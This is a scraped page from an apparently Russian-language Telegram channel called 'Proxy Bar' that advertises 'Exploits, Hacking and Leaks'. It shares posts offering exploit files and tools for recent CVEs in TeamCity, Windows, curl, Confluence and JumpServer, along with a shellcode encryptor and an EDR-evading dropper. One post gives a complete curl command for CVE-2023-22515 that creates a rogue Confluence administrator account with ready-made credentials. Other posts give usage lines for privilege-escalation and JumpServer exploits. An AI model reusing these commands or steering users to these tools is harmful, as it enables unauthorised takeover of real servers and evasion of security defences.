Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2023-42793.py
3.7 KB
CVE-2023-42793
Authentication Bypass in JetBrains TeamCity CI/CD
🔥16
Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу

#ran #redteam #malware
👍11😱7
Свежий выпуск Inception 7
🔥12😱7👍1
Supernova
Real fucking shellcode encryptor (бгг)
download

#shellcode #enc
👍7🔥4
Следим за трендами
* exim RCE
* Linux glibc LPE
* curl RCE
* WS_FTPd
* admin/admin
👍25🔥15
Abusing Active Directory Certificate Services
Part One (5 october 2023)

#AD
👍14🔥3
From C, with inline assembly, to shellcode
read

#C #shell
👍11😱9🔥3
Более 100 Hacking / Infosec pdf
read\download
🔥17👍3
👍25😱8
VULN in CURL
get CVE-2023-38545 - поиграться (сегодня patch)

#curl
🔥13👍3
CVE-2023-36802
windows Local Privilege Escalation
Usage:
Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>
где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEM
POC

#win #lpe
👍8🔥4😱1
Ох твою мать а, не было печали...)))))))))))))))))
Короче, план такой
Надеюсь консультанты из Xpanamas ciscoTalos
👍4🔥3😱1
Повышаем привилегии via apt-get
всегда смешно

#linux #up
🔥48👍9
CVE-2023-22515
Confluence Data Center and Server - Broken Access Control Vulnerability
POC:
curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action

login - adm1n/adm1n

Почитать как это работает
🔥14😱6👍2
Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых.
Домен: Эукариоты
Царство: Грибы
*
А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR.
download

#bypass #edr
👍13🔥6😱2
Внутри JS ?))
😱25👍16
ДатаСексуалы на месте ?
Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин
Переходите сразу к таблице
Только вот с CVE-2023-36778 НЕ угадали
👍15
CVE-2023-42820
Дырка в JumpServer (opensource хост-бастион)

Usage:
python CVE-2023-42820.py -t http://IP:Port -e email -u username